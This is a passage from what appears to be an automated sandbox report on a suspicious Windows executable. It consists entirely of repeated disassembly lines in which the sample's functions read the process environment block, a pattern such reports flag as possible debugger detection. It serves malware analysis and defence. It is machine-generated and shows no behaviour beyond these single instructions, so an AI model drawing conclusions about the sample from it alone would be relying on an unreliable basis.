          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B169A6 mov eax, dword ptr fs:[00000030h]1_2_00B169A6
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ACA185 mov eax, dword ptr fs:[00000030h]1_2_00ACA185
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ABC182 mov eax, dword ptr fs:[00000030h]1_2_00ABC182
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC2990 mov eax, dword ptr fs:[00000030h]1_2_00AC2990
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A9B1E1 mov eax, dword ptr fs:[00000030h]1_2_00A9B1E1
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A9B1E1 mov eax, dword ptr fs:[00000030h]1_2_00A9B1E1
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A9B1E1 mov eax, dword ptr fs:[00000030h]1_2_00A9B1E1
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B241E8 mov eax, dword ptr fs:[00000030h]1_2_00B241E8
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AB4120 mov eax, dword ptr fs:[00000030h]1_2_00AB4120
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AB4120 mov eax, dword ptr fs:[00000030h]1_2_00AB4120
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AB4120 mov eax, dword ptr fs:[00000030h]1_2_00AB4120
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AB4120 mov eax, dword ptr fs:[00000030h]1_2_00AB4120
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AB4120 mov ecx, dword ptr fs:[00000030h]1_2_00AB4120
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC513A mov eax, dword ptr fs:[00000030h]1_2_00AC513A
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC513A mov eax, dword ptr fs:[00000030h]1_2_00AC513A
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A99100 mov eax, dword ptr fs:[00000030h]1_2_00A99100
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A99100 mov eax, dword ptr fs:[00000030h]1_2_00A99100
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A99100 mov eax, dword ptr fs:[00000030h]1_2_00A99100
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A9C962 mov eax, dword ptr fs:[00000030h]1_2_00A9C962
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A9B171 mov eax, dword ptr fs:[00000030h]1_2_00A9B171
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A9B171 mov eax, dword ptr fs:[00000030h]1_2_00A9B171
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ABB944 mov eax, dword ptr fs:[00000030h]1_2_00ABB944
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ABB944 mov eax, dword ptr fs:[00000030h]1_2_00ABB944
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A952A5 mov eax, dword ptr fs:[00000030h]1_2_00A952A5
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A952A5 mov eax, dword ptr fs:[00000030h]1_2_00A952A5
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A952A5 mov eax, dword ptr fs:[00000030h]1_2_00A952A5
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A952A5 mov eax, dword ptr fs:[00000030h]1_2_00A952A5
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A952A5 mov eax, dword ptr fs:[00000030h]1_2_00A952A5
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AAAAB0 mov eax, dword ptr fs:[00000030h]1_2_00AAAAB0
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AAAAB0 mov eax, dword ptr fs:[00000030h]1_2_00AAAAB0
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ACFAB0 mov eax, dword ptr fs:[00000030h]1_2_00ACFAB0
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ACD294 mov eax, dword ptr fs:[00000030h]1_2_00ACD294
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ACD294 mov eax, dword ptr fs:[00000030h]1_2_00ACD294
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC2AE4 mov eax, dword ptr fs:[00000030h]1_2_00AC2AE4
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC2ACB mov eax, dword ptr fs:[00000030h]1_2_00AC2ACB
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD4A2C mov eax, dword ptr fs:[00000030h]1_2_00AD4A2C
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD4A2C mov eax, dword ptr fs:[00000030h]1_2_00AD4A2C
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AA8A0A mov eax, dword ptr fs:[00000030h]1_2_00AA8A0A
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AB3A1C mov eax, dword ptr fs:[00000030h]1_2_00AB3A1C
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A95210 mov eax, dword ptr fs:[00000030h]1_2_00A95210
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A95210 mov ecx, dword ptr fs:[00000030h]1_2_00A95210
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A95210 mov eax, dword ptr fs:[00000030h]1_2_00A95210
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A95210 mov eax, dword ptr fs:[00000030h]1_2_00A95210
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A9AA16 mov eax, dword ptr fs:[00000030h]1_2_00A9AA16
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A9AA16 mov eax, dword ptr fs:[00000030h]1_2_00A9AA16
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B4B260 mov eax, dword ptr fs:[00000030h]1_2_00B4B260
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B4B260 mov eax, dword ptr fs:[00000030h]1_2_00B4B260
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B68A62 mov eax, dword ptr fs:[00000030h]1_2_00B68A62
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD927A mov eax, dword ptr fs:[00000030h]1_2_00AD927A
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B24257 mov eax, dword ptr fs:[00000030h]1_2_00B24257
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A99240 mov eax, dword ptr fs:[00000030h]1_2_00A99240
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A99240 mov eax, dword ptr fs:[00000030h]1_2_00A99240
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A99240 mov eax, dword ptr fs:[00000030h]1_2_00A99240
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A99240 mov eax, dword ptr fs:[00000030h]1_2_00A99240
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC4BAD mov eax, dword ptr fs:[00000030h]1_2_00AC4BAD
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC4BAD mov eax, dword ptr fs:[00000030h]1_2_00AC4BAD
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC4BAD mov eax, dword ptr fs:[00000030h]1_2_00AC4BAD
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B65BA5 mov eax, dword ptr fs:[00000030h]1_2_00B65BA5
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AA1B8F mov eax, dword ptr fs:[00000030h]1_2_00AA1B8F
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AA1B8F mov eax, dword ptr fs:[00000030h]1_2_00AA1B8F
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B4D380 mov ecx, dword ptr fs:[00000030h]1_2_00B4D380
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC2397 mov eax, dword ptr fs:[00000030h]1_2_00AC2397
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ACB390 mov eax, dword ptr fs:[00000030h]1_2_00ACB390
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B5138A mov eax, dword ptr fs:[00000030h]1_2_00B5138A
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ABDBE9 mov eax, dword ptr fs:[00000030h]1_2_00ABDBE9
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC03E2 mov eax, dword ptr fs:[00000030h]1_2_00AC03E2
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC03E2 mov eax, dword ptr fs:[00000030h]1_2_00AC03E2
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC03E2 mov eax, dword ptr fs:[00000030h]1_2_00AC03E2
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC03E2 mov eax, dword ptr fs:[00000030h]1_2_00AC03E2
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC03E2 mov eax, dword ptr fs:[00000030h]1_2_00AC03E2
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC03E2 mov eax, dword ptr fs:[00000030h]1_2_00AC03E2
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B153CA mov eax, dword ptr fs:[00000030h]1_2_00B153CA
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B153CA mov eax, dword ptr fs:[00000030h]1_2_00B153CA
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B5131B mov eax, dword ptr fs:[00000030h]1_2_00B5131B
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A9DB60 mov ecx, dword ptr fs:[00000030h]1_2_00A9DB60
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC3B7A mov eax, dword ptr fs:[00000030h]1_2_00AC3B7A
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC3B7A mov eax, dword ptr fs:[00000030h]1_2_00AC3B7A
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A9DB40 mov eax, dword ptr fs:[00000030h]1_2_00A9DB40
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B68B58 mov eax, dword ptr fs:[00000030h]1_2_00B68B58
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A9F358 mov eax, dword ptr fs:[00000030h]1_2_00A9F358
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AA849B mov eax, dword ptr fs:[00000030h]1_2_00AA849B
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B16CF0 mov eax, dword ptr fs:[00000030h]1_2_00B16CF0
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B16CF0 mov eax, dword ptr fs:[00000030h]1_2_00B16CF0
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B16CF0 mov eax, dword ptr fs:[00000030h]1_2_00B16CF0
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B514FB mov eax, dword ptr fs:[00000030h]1_2_00B514FB
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B68CD6 mov eax, dword ptr fs:[00000030h]1_2_00B68CD6
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ACBC2C mov eax, dword ptr fs:[00000030h]1_2_00ACBC2C
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]1_2_00B51C06
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]1_2_00B51C06
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]1_2_00B51C06
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]1_2_00B51C06
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]1_2_00B51C06
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]1_2_00B51C06
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]1_2_00B51C06
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]1_2_00B51C06
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]1_2_00B51C06
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]1_2_00B51C06
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]1_2_00B51C06
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]1_2_00B51C06
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]1_2_00B51C06
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]1_2_00B51C06
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B6740D mov eax, dword ptr fs:[00000030h]1_2_00B6740D
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B6740D mov eax, dword ptr fs:[00000030h]1_2_00B6740D
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B6740D mov eax, dword ptr fs:[00000030h]1_2_00B6740D
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B16C0A mov eax, dword ptr fs:[00000030h]1_2_00B16C0A
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B16C0A mov eax, dword ptr fs:[00000030h]1_2_00B16C0A
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B16C0A mov eax, dword ptr fs:[00000030h]1_2_00B16C0A
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B16C0A mov eax, dword ptr fs:[00000030h]1_2_00B16C0A
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AB746D mov eax, dword ptr fs:[00000030h]1_2_00AB746D
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B2C450 mov eax, dword ptr fs:[00000030h]1_2_00B2C450
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B2C450 mov eax, dword ptr fs:[00000030h]1_2_00B2C450
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ACA44B mov eax, dword ptr fs:[00000030h]1_2_00ACA44B
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC35A1 mov eax, dword ptr fs:[00000030h]1_2_00AC35A1
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC1DB5 mov eax, dword ptr fs:[00000030h]1_2_00AC1DB5
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC1DB5 mov eax, dword ptr fs:[00000030h]1_2_00AC1DB5
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC1DB5 mov eax, dword ptr fs:[00000030h]1_2_00AC1DB5
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B605AC mov eax, dword ptr fs:[00000030h]1_2_00B605AC
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B605AC mov eax, dword ptr fs:[00000030h]1_2_00B605AC
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A92D8A mov eax, dword ptr fs:[00000030h]1_2_00A92D8A
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A92D8A mov eax, dword ptr fs:[00000030h]1_2_00A92D8A
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A92D8A mov eax, dword ptr fs:[00000030h]1_2_00A92D8A
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A92D8A mov eax, dword ptr fs:[00000030h]1_2_00A92D8A
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A92D8A mov eax, dword ptr fs:[00000030h]1_2_00A92D8A
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC2581 mov eax, dword ptr fs:[00000030h]1_2_00AC2581
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC2581 mov eax, dword ptr fs:[00000030h]1_2_00AC2581
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC2581 mov eax, dword ptr fs:[00000030h]1_2_00AC2581
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC2581 mov eax, dword ptr fs:[00000030h]1_2_00AC2581
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ACFD9B mov eax, dword ptr fs:[00000030h]1_2_00ACFD9B
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ACFD9B mov eax, dword ptr fs:[00000030h]1_2_00ACFD9B
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B48DF1 mov eax, dword ptr fs:[00000030h]1_2_00B48DF1
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AAD5E0 mov eax, dword ptr fs:[00000030h]1_2_00AAD5E0
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AAD5E0 mov eax, dword ptr fs:[00000030h]1_2_00AAD5E0
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B16DC9 mov eax, dword ptr fs:[00000030h]1_2_00B16DC9
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B16DC9 mov eax, dword ptr fs:[00000030h]1_2_00B16DC9
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B16DC9 mov eax, dword ptr fs:[00000030h]1_2_00B16DC9
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B16DC9 mov ecx, dword ptr fs:[00000030h]1_2_00B16DC9
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B16DC9 mov eax, dword ptr fs:[00000030h]1_2_00B16DC9
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B16DC9 mov eax, dword ptr fs:[00000030h]1_2_00B16DC9
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B68D34 mov eax, dword ptr fs:[00000030h]1_2_00B68D34
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B1A537 mov eax, dword ptr fs:[00000030h]1_2_00B1A537
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC4D3B mov eax, dword ptr fs:[00000030h]1_2_00AC4D3B
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC4D3B mov eax, dword ptr fs:[00000030h]1_2_00AC4D3B
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC4D3B mov eax, dword ptr fs:[00000030h]1_2_00AC4D3B
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A9AD30 mov eax, dword ptr fs:[00000030h]1_2_00A9AD30
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]1_2_00AA3D34
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]1_2_00AA3D34
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]1_2_00AA3D34
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]1_2_00AA3D34
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]1_2_00AA3D34
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]1_2_00AA3D34
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]1_2_00AA3D34
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]1_2_00AA3D34
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]1_2_00AA3D34
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]1_2_00AA3D34
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]1_2_00AA3D34
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]1_2_00AA3D34
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]1_2_00AA3D34
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ABC577 mov eax, dword ptr fs:[00000030h]1_2_00ABC577
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ABC577 mov eax, dword ptr fs:[00000030h]1_2_00ABC577
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD3D43 mov eax, dword ptr fs:[00000030h]1_2_00AD3D43
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B13540 mov eax, dword ptr fs:[00000030h]1_2_00B13540
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AB7D50 mov eax, dword ptr fs:[00000030h]1_2_00AB7D50
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B60EA5 mov eax, dword ptr fs:[00000030h]1_2_00B60EA5
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B60EA5 mov eax, dword ptr fs:[00000030h]1_2_00B60EA5
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B60EA5 mov eax, dword ptr fs:[00000030h]1_2_00B60EA5
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B146A7 mov eax, dword ptr fs:[00000030h]1_2_00B146A7
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B2FE87 mov eax, dword ptr fs:[00000030h]1_2_00B2FE87
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AA76E2 mov eax, dword ptr fs:[00000030h]1_2_00AA76E2
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC16E0 mov ecx, dword ptr fs:[00000030h]1_2_00AC16E0
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B68ED6 mov eax, dword ptr fs:[00000030h]1_2_00B68ED6
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC36CC mov eax, dword ptr fs:[00000030h]1_2_00AC36CC
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD8EC7 mov eax, dword ptr fs:[00000030h]1_2_00AD8EC7
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B4FEC0 mov eax, dword ptr fs:[00000030h]1_2_00B4FEC0
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A9E620 mov eax, dword ptr fs:[00000030h]1_2_00A9E620
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B4FE3F mov eax, dword ptr fs:[00000030h]1_2_00B4FE3F
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A9C600 mov eax, dword ptr fs:[00000030h]1_2_00A9C600
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A9C600 mov eax, dword ptr fs:[00000030h]1_2_00A9C600
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A9C600 mov eax, dword ptr fs:[00000030h]1_2_00A9C600
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC8E00 mov eax, dword ptr fs:[00000030h]1_2_00AC8E00
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ACA61C mov eax, dword ptr fs:[00000030h]1_2_00ACA61C
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ACA61C mov eax, dword ptr fs:[00000030h]1_2_00ACA61C
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B51608 mov eax, dword ptr fs:[00000030h]1_2_00B51608
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AA766D mov eax, dword ptr fs:[00000030h]1_2_00AA766D
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ABAE73 mov eax, dword ptr fs:[00000030h]1_2_00ABAE73
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ABAE73 mov eax, dword ptr fs:[00000030h]1_2_00ABAE73
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ABAE73 mov eax, dword ptr fs:[00000030h]1_2_00ABAE73
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ABAE73 mov eax, dword ptr fs:[00000030h]1_2_00ABAE73
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ABAE73 mov eax, dword ptr fs:[00000030h]1_2_00ABAE73
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AA7E41 mov eax, dword ptr fs:[00000030h]1_2_00AA7E41
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AA7E41 mov eax, dword ptr fs:[00000030h]1_2_00AA7E41
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AA7E41 mov eax, dword ptr fs:[00000030h]1_2_00AA7E41
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AA7E41 mov eax, dword ptr fs:[00000030h]1_2_00AA7E41
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AA7E41 mov eax, dword ptr fs:[00000030h]1_2_00AA7E41
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AA7E41 mov eax, dword ptr fs:[00000030h]1_2_00AA7E41
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B17794 mov eax, dword ptr fs:[00000030h]1_2_00B17794
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B17794 mov eax, dword ptr fs:[00000030h]1_2_00B17794
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B17794 mov eax, dword ptr fs:[00000030h]1_2_00B17794
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AA8794 mov eax, dword ptr fs:[00000030h]1_2_00AA8794
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD37F5 mov eax, dword ptr fs:[00000030h]1_2_00AD37F5
